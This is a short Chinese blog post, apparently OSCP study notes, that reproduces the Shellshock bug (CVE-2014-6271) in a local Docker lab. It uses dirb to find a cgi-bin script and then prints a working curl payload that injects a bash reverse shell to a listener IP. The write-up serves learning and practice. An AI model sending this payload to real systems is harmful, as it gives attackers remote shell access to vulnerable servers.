CVE-2014-6271漏洞复现

0x00 前言

要是平时我肯定不会想打去复现这个漏洞的,但是由于需要学习shellshock漏洞的利用,所以这里可以进行一下复现

0x01 正文

这里直接使用别人弄好的docker,简单又方便

docker pull hmlio/vaas-cve-2014-6271

下载完成之后,开启docker

docker run -d -p 80:80 hmlio/vaas-cve-2014-6271

访问目标页面
在这里插入图片描述
这里还需要知道一个路劲,直接dirb
在这里插入图片描述
这里接着对cgi-bin进行一个爆破
在这里插入图片描述
最后拿到目标
执行payload:
curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.25.165/2333 0<&1 2>&1” http://192.168.25.178/cgi-bin/stats

这里不使用msf因为oscp 规定msf只能使用一次来着(我隐约记得)

kali监听就行
在这里插入图片描述

发布了441 篇原创文章 · 获赞 124 · 访问量 29万+

猜你喜欢

转载自blog.csdn.net/qq_36869808/article/details/104005219
今日推荐